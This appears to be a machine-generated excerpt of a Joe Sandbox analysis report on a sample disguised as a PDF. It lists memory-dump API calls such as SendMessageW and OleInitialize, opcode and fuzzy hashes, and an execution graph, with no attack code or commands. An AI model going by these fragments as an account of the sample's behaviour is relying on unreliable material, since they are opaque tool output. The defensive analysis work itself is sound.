                                                                                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 06CE52FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                • Opcode ID: 5322bfb8e0093fbc0e44e3c0565f4144ea9b3e3ed873ad9e9f7ede2b7f6bbb97
                                                                                                                                                                                • Instruction ID: 33cc5e6f645c4e7a5907bcd396481c67e7d353a8b073fd03542894a70c546694
                                                                                                                                                                                • Opcode Fuzzy Hash: 5322bfb8e0093fbc0e44e3c0565f4144ea9b3e3ed873ad9e9f7ede2b7f6bbb97
                                                                                                                                                                                • Instruction Fuzzy Hash: 991106B5800349DFDB10CF9AC945BEEFBF8EB58324F108419E554A3251D379A984CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 027CAF9E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: fe6250a91f3c4f27ecabc0aa7e9439d149b68d5b2bc186af726f09949b320ff9
                                                                                                                                                                                • Instruction ID: 9c04970e71d1b5743996696ece5fa7d422ce36ecae7f69510f1f1d2467c809e3
                                                                                                                                                                                • Opcode Fuzzy Hash: fe6250a91f3c4f27ecabc0aa7e9439d149b68d5b2bc186af726f09949b320ff9
                                                                                                                                                                                • Instruction Fuzzy Hash: AF11E0B6D007498FCB10CFAAD544ADEFBF4AB89324F20846ED859B7210C379A545CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,00000018,00000001,?), ref: 06CE1B9D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 907ee53902fa66efc61bf13ab49b42838fba2ff5d8506590248f6361674b5d26
                                                                                                                                                                                • Instruction ID: d2e7a616bc06966b064bb81906996d6acd88687cd030247b671b6643f8314689
                                                                                                                                                                                • Opcode Fuzzy Hash: 907ee53902fa66efc61bf13ab49b42838fba2ff5d8506590248f6361674b5d26
                                                                                                                                                                                • Instruction Fuzzy Hash: 581122B58003489FDB10DF8AC884BEEBBF8EB48320F108419E918A7710D374A980CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 06CE6C3D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                • Opcode ID: 72febcdf948ad7ac02a593a090b652d08c61eed22587c5d739835f0c4fdbbc15
                                                                                                                                                                                • Instruction ID: cc7672285449728b943133ef56f36ee5d33599c6e95cf5cf7b4ec72d2f664164
                                                                                                                                                                                • Opcode Fuzzy Hash: 72febcdf948ad7ac02a593a090b652d08c61eed22587c5d739835f0c4fdbbc15
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C1103B59007488FDB20DF9AD544BDEBBF4EB58324F108459D518A7210D374A944CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,00000018,00000001,?), ref: 06CE1B9D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 5b12bb038dc5d61b797fe68e2bad3e8ecb8c0bcc3bfae6ac4744bd082d4f2aac
                                                                                                                                                                                • Instruction ID: 5d107a08237a5b5872b1cb1102727ab5da67be056ed619c6b094a84cd921a0fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b12bb038dc5d61b797fe68e2bad3e8ecb8c0bcc3bfae6ac4744bd082d4f2aac
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F11F2B68003099FDB10CF99D985BDEFBF8EB48320F14841AD558A7750D375A644CFA1
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DispatchMessage
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                                                                • Opcode ID: 88807ff4a989e1f6e0c9dd90b4cae603703712f525a79e6fb6ba38223830619c
                                                                                                                                                                                • Instruction ID: 7208057ac778f72db533b8669293329ce1cfc99071473842f280e766669d8116
                                                                                                                                                                                • Opcode Fuzzy Hash: 88807ff4a989e1f6e0c9dd90b4cae603703712f525a79e6fb6ba38223830619c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C11FEB5C007498FCB20CF9AD844BDEFBF4EB48324F10842AD469A7250C378A545CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DispatchMessage
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                                                                • Opcode ID: 7aa60c5f57d64c0ec3c3e657668a6428a4d715edc5b8b7c362a2df87767a211b
                                                                                                                                                                                • Instruction ID: f5f13d1b24be25fca749bac57f1b9ef7ede37a9201f2ad96dd5e7542d745e3b1
                                                                                                                                                                                • Opcode Fuzzy Hash: 7aa60c5f57d64c0ec3c3e657668a6428a4d715edc5b8b7c362a2df87767a211b
                                                                                                                                                                                • Instruction Fuzzy Hash: F011DDB5C007498FCB20DF9AD884BDEFBF4EB48324F10852AD469A7250D378A544CFA5
                                                                                                                                                                                APIs
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 06CE6C3D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4163795521.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6ce0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                • Opcode ID: bc91c81a4fc4d1f27bad46321632aed9add4ae2238267df5a57cd5119571697c
                                                                                                                                                                                • Instruction ID: f4cd705d13f37fa9dc6013af8b03012398fb6e5d81cad19ae4b7185b323bab22
                                                                                                                                                                                • Opcode Fuzzy Hash: bc91c81a4fc4d1f27bad46321632aed9add4ae2238267df5a57cd5119571697c
                                                                                                                                                                                • Instruction Fuzzy Hash: 95111EB5D003088FCB20DF9AD589BDEBBF4EB48324F20845AD558A7210D338A944CFA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
                                                                                                                                                                                • Instruction ID: 3495780448f1b9d103e07fa9cf003570ec7ed1b3172206a02459f91b13f6ca12
                                                                                                                                                                                • Opcode Fuzzy Hash: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
                                                                                                                                                                                • Instruction Fuzzy Hash: 6221F271604200DFCB18DF24E9C4B26BBA6FB84B14F24C569E84A4B296C33AD847CE71
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3a28b4d6c781823e10800750d60aa91218fce7ef7cf85caf28d05e9e47d62af6
                                                                                                                                                                                • Instruction ID: 3b81af6a49f933683171fd159f35681898947d21ef5da91d020299570a635f54
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a28b4d6c781823e10800750d60aa91218fce7ef7cf85caf28d05e9e47d62af6
                                                                                                                                                                                • Instruction Fuzzy Hash: E8212775504244DFDB01DF14E9C4B2ABBA6FB94324F38C569D8494B255C33ADC4ACEB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
                                                                                                                                                                                • Instruction ID: 562eccace7cee81d836d535df05c066562d9381761c3c86edafd71c71cbbd056
                                                                                                                                                                                • Opcode Fuzzy Hash: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
                                                                                                                                                                                • Instruction Fuzzy Hash: C02180755093808FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4129430071.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d3d000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                • Instruction ID: 1c3d8f74acb74191cdf89c669544ede57bc0218e78b32499d5286649e8b479c8
                                                                                                                                                                                • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                • Instruction Fuzzy Hash: AA11B675504240CFDB11CF14D5C4719FF62FB84314F28C5A9D8494B656C33AD80ACFA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3deccbebf5b79f07d76899c8ad666f75e9eb3ec684e47cedacc8dd770a7f1e70
                                                                                                                                                                                • Instruction ID: 08112f57f4d719d6bda2486fd85127219bcf677f9a0391e53f659458242c53ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 3deccbebf5b79f07d76899c8ad666f75e9eb3ec684e47cedacc8dd770a7f1e70
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B1274B0C8174ECADB10CF66E99C18D7BB1B78931CBD0CA09D2615E2E1DBB4156ACF64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4130408711.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_27c0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2412ea45c6bf047a43b13d45e42b5c46666b30399e060b7f036fddcc1156b74
                                                                                                                                                                                • Instruction ID: 7735e0346be2c0358a1ea8171c963e8194261de0acf8f5172828a916da6285e8
                                                                                                                                                                                • Opcode Fuzzy Hash: a2412ea45c6bf047a43b13d45e42b5c46666b30399e060b7f036fddcc1156b74
                                                                                                                                                                                • Instruction Fuzzy Hash: 19A14936E002198FCF15DFB4C84459EBBB3BF89304B25856EE901AB265DB31E956CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0ca7ab4ef3b71fe620c0ee61d819831f9d06f8f8284b2282071360d7a9bd66d4
                                                                                                                                                                                • Instruction ID: 0e284c9b12eef2dcf27d24f1dc159c292c97427ab7bdd18240a87f10c2428530
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca7ab4ef3b71fe620c0ee61d819831f9d06f8f8284b2282071360d7a9bd66d4
                                                                                                                                                                                • Instruction Fuzzy Hash: B3C10DB0C8174ACBDB11CF26E89818D7B71BB8931CB95CB09D2616F2E1DBB41466CF64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8b16141c25f773b648838e718422753182216d1daef7082756ae473c1122b2a7
                                                                                                                                                                                • Instruction ID: e2757ee72c7d29b0617f174287cc0cdc0acb0d801e905eca7a18dcfbcaceb828
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b16141c25f773b648838e718422753182216d1daef7082756ae473c1122b2a7
                                                                                                                                                                                • Instruction Fuzzy Hash: D4417334A04248DFCB05DFA5D590AADBBB2FF89300F2880A9E944AB361DB35ED55CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 539b2cb43c7cb8a48beb45702b9b492c08e7fcecb9c34747743d66541a24a823
                                                                                                                                                                                • Instruction ID: 9737c69f7590e4715417503684007d69e49cc13e7cd7bb1ee73e97739f69c4b6
                                                                                                                                                                                • Opcode Fuzzy Hash: 539b2cb43c7cb8a48beb45702b9b492c08e7fcecb9c34747743d66541a24a823
                                                                                                                                                                                • Instruction Fuzzy Hash: DB916B74A002458FCB15CF9DC5949BAFBB1FF49310B2489A9D815AB365C736FC51CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c89e38ef63df8f20ac7595e728217714aedf5207adb7e2cdfab2f1c06122612a
                                                                                                                                                                                • Instruction ID: 38a444f03433e83d7f9b809eb50760fa1efe28b0ed0e3de84db99b1a8fcf0d39
                                                                                                                                                                                • Opcode Fuzzy Hash: c89e38ef63df8f20ac7595e728217714aedf5207adb7e2cdfab2f1c06122612a
                                                                                                                                                                                • Instruction Fuzzy Hash: 874139B4A105458FCB09CF58C5A89BAFBB1FF48314B1586A9D815AB364C736FC51CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 52b32c78843e2b10180bcd26d85e8fd85655dabc9eedaac0832264715bc8dbcf
                                                                                                                                                                                • Instruction ID: b4d36fba470abe07eeb536edc4d7d892ce1068748467c58f03cd7f4f096d6c7b
                                                                                                                                                                                • Opcode Fuzzy Hash: 52b32c78843e2b10180bcd26d85e8fd85655dabc9eedaac0832264715bc8dbcf
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B11042295E3E25FEB03AB78A8700E57FB09E4326470A05E7C0D0CF0B3D5198A5DC3A6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696098473.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 46801985e10fd5cf560db405e5b2971cde963cfa5d9e12d908e5c76f6e742846
                                                                                                                                                                                • Instruction ID: bf0a1acf97712fa1f85f20246acd688ff69fc6d7ab8ef4b71290bbbb55c60bc5
                                                                                                                                                                                • Opcode Fuzzy Hash: 46801985e10fd5cf560db405e5b2971cde963cfa5d9e12d908e5c76f6e742846
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C01176240D3C4AFD7128A258994652BFA8EF43224F1984DBE8888F2A7D2699C45C772
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696098473.000000000365D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0365D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_365d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2e762706dcedf4067ce3074cb67ef30b536aa3cdf9f7395dfbc5588aeaf20e91
                                                                                                                                                                                • Instruction ID: a37b057b8c80d26d138825b1a0c200c17d685981a05eead9bdbba3fc2df7b018
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e762706dcedf4067ce3074cb67ef30b536aa3cdf9f7395dfbc5588aeaf20e91
                                                                                                                                                                                • Instruction Fuzzy Hash: 4101A272409344AAE710CE29CA84B67FF98EF45324F1CC57AFD484A2C6C6799882C6B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.1696474068.00000000036C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_36c0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 936d3a15e004d9a542113f369e6ee5d92adb7d41100427eb4b60793bce99b0cf
                                                                                                                                                                                • Instruction ID: 2f0b6454e13c555ad79757c93fec8ae467d41c819220e1ae22f6c5b407847c84
                                                                                                                                                                                • Opcode Fuzzy Hash: 936d3a15e004d9a542113f369e6ee5d92adb7d41100427eb4b60793bce99b0cf
                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0A431A041449FCB02CF98D860AEDFB71FF49320F244196D455A72A1C337AD12CB60

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:12.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:169
                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                execution_graph 47810 5b67db7 47813 5b67a50 47810->47813 47814 5b67a5b 47813->47814 47817 5b68f79 47814->47817 47815 5b67dc4 47818 5b68fd7 GetCurrentThreadId 47817->47818 47820 5b6901d 47818->47820 47820->47815 47838 7617d40 47839 7617d56 47838->47839 47840 7617dad 47839->47840 47844 7617dc1 47839->47844 47848 7617dd0 47839->47848 47847 7617dcf 47844->47847 47852 7610e88 47847->47852 47849 7617df0 47848->47849 47850 7610e88 KiUserCallbackDispatcher 47849->47850 47851 7617d77 47850->47851 47854 7610eb7 47852->47854 47853 7610f3e 47854->47853 47855 7610fc9 KiUserCallbackDispatcher 47854->47855 47855->47853 47856 761dc40 47857 761dc79 47856->47857 47858 761decf 47857->47858 47861 7612897 47857->47861 47865 76128a8 47857->47865 47861->47861 47862 76128a6 47861->47862 47863 76128bf 47862->47863 47864 7612912 KiUserCallbackDispatcher 47862->47864 47863->47858 47864->47863 47867 76128bb 47865->47867 47866 76128bf 47866->47858 47867->47866 47868 7612912 KiUserCallbackDispatcher 47867->47868 47868->47866 47821 8a58aa0 47823 8a58ab2 47821->47823 47822 8a58bcd 47823->47822 47826 8a506c0 47823->47826 47832 8a506d0 47823->47832 47827 8a50714 47826->47827 47831 8a5078e 47826->47831 47828 8a50721 GetFocus 47827->47828 47827->47831 47829 8a50749 47828->47829 47830 8a50783 KiUserCallbackDispatcher 47829->47830 47829->47831 47830->47831 47831->47822 47833 8a50714 47832->47833 47837 8a5078e 47832->47837 47834 8a50721 GetFocus 47833->47834 47833->47837 47835 8a50749 47834->47835 47836 8a50783 KiUserCallbackDispatcher 47835->47836 47835->47837 47836->47837 47837->47822 47895 761d128 47896 761d30c 47895->47896 47897 761d193 47895->47897 47897->47896 47898 761d252 GetCapture 47897->47898 47900 761d294 47898->47900 47899 761d2d5 GetActiveWindow 47899->47896 47900->47899 47901 1d2e018 47902 1d2e024 47901->47902 47903 1d2e0ae 47902->47903 47905 5b61702 47902->47905 47906 5b61713 47905->47906 47912 5b618e3 47906->47912 47916 5b6181d 47906->47916 47920 5b61770 47906->47920 47924 5b61780 47906->47924 47907 5b61743 47907->47903 47913 5b618ea 47912->47913 47928 5b65ee5 47913->47928 47917 5b61824 47916->47917 47919 5b65ee5 6 API calls 47917->47919 47918 5b6199f 47918->47907 47919->47918 47921 5b61780 47920->47921 47923 5b65ee5 6 API calls 47921->47923 47922 5b6199f 47922->47907 47923->47922 47925 5b617ad 47924->47925 47927 5b65ee5 6 API calls 47925->47927 47926 5b6199f 47926->47907 47927->47926 47929 5b65f04 47928->47929 47933 5b6607b 47928->47933 47930 5b65f87 GetActiveWindow 47929->47930 47932 5b65fb5 47929->47932 47929->47933 47930->47932 47931 5b66027 47952 5b69540 47931->47952 47957 5b6953a 47931->47957 47932->47933 47939 5b66b70 47932->47939 47943 5b66bd0 47932->47943 47948 5b66b98 47932->47948 47940 5b66b79 47939->47940 47963 5b668f4 47940->47963 47944 5b66bac 47943->47944 47947 5b66bda 47943->47947 47945 5b66bc5 47944->47945 47981 5b66904 47944->47981 47945->47931 47947->47931 47949 5b66ba8 47948->47949 47950 5b66bc5 47949->47950 47951 5b66904 4 API calls 47949->47951 47950->47931 47951->47950 47953 5b66b98 4 API calls 47952->47953 47954 5b69548 47953->47954 47991 5b67c14 47954->47991 47958 5b69540 47957->47958 47959 5b66b98 4 API calls 47958->47959 47960 5b69548 47959->47960 47961 5b67c14 5 API calls 47960->47961 47962 5b69553 47961->47962 47962->47933 47964 5b668ff 47963->47964 47967 5b67a40 47964->47967 47969 5b67a4b 47967->47969 47968 5b67d7a 47969->47968 47970 5b66b98 4 API calls 47969->47970 47971 5b67e73 47970->47971 47974 5b67b18 47971->47974 47973 5b67e7c 47975 5b67b23 47974->47975 47977 5b68193 47975->47977 47978 5b67b34 47975->47978 47977->47973 47979 5b681c8 OleInitialize 47978->47979 47980 5b6822c 47979->47980 47980->47977 47982 5b6690f GetCurrentProcess 47981->47982 47984 5b671e1 47982->47984 47985 5b671e8 GetCurrentThread 47982->47985 47984->47985 47986 5b67225 GetCurrentProcess 47985->47986 47987 5b6721e 47985->47987 47988 5b6725b 47986->47988 47987->47986 47989 5b67283 GetCurrentThreadId 47988->47989 47990 5b672b4 47989->47990 47990->47945 47992 5b67c1f 47991->47992 47993 5b67a40 5 API calls 47992->47993 47994 5b695a2 47993->47994 47994->47994 47869 5b67398 DuplicateHandle 47870 5b6742e 47869->47870 47995 5b69078 47996 5b690c6 EnumThreadWindows 47995->47996 47997 5b690bc 47995->47997 47998 5b690f8 47996->47998 47997->47996 47871 7610950 47874 7610124 47871->47874 47873 7610967 47875 761012f 47874->47875 47877 7610a20 47875->47877 47880 7610e88 KiUserCallbackDispatcher 47875->47880 47881 7610a31 47875->47881 47886 7610a40 47875->47886 47876 76109ea 47876->47873 47877->47873 47880->47876 47882 7610a40 47881->47882 47884 7610c85 47882->47884 47885 7610e88 KiUserCallbackDispatcher 47882->47885 47883 7610cbb 47883->47876 47884->47876 47885->47883 47888 7610a67 47886->47888 47887 7610cbb 47887->47876 47889 7610c85 47888->47889 47890 7610e88 KiUserCallbackDispatcher 47888->47890 47889->47876 47890->47887 47999 76129b0 48000 7610124 KiUserCallbackDispatcher 47999->48000 48001 76129c6 48000->48001 48002 761ef90 48003 761efa0 48002->48003 48007 5b69820 SendMessageW 48003->48007 48009 5b69818 48003->48009 48004 761efb1 48008 5b6988c 48007->48008 48008->48004 48010 5b69820 SendMessageW 48009->48010 48011 5b6988c 48010->48011 48011->48004 48012 8a53a53 48013 8a53a66 48012->48013 48017 8a53c88 PostMessageW 48013->48017 48019 8a53c80 48013->48019 48014 8a53a89 48018 8a53cf4 48017->48018 48018->48014 48020 8a53c88 PostMessageW 48019->48020 48021 8a53cf4 48020->48021 48021->48014 47891 5b69408 47892 5b6944d MessageBoxW 47891->47892 47894 5b69494 47892->47894

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
